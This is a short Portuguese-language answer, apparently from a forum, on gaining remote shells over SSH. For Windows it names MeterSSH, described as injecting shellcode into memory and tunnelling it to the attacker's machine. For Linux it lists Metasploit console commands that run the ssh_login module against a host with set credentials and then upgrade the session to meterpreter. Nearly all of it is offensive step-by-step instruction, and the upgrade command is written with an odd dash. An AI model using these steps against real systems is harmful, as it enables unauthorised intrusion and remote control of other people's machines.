Windows:
Você pode tentar usar MeterSSH .
MeterSSH é uma maneira fácil de injetar código shell nativo na memória e canalizar qualquer coisa sobre SSH para a máquina atacante através de um túnel SSH e tudo independente em um único arquivo Python.
Linux:
Você pode usar o módulo auxiliar do metasploit chamado ssh_login:
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 192.168.0.109
msf auxiliary(ssh_login) > set username foo
msf auxiliary(ssh_login) > set password bar
msf auxiliary(ssh_login) > exploit
Agora, converta o shell de comando no shell do meterpreter usando o seguinte comando
session –u 1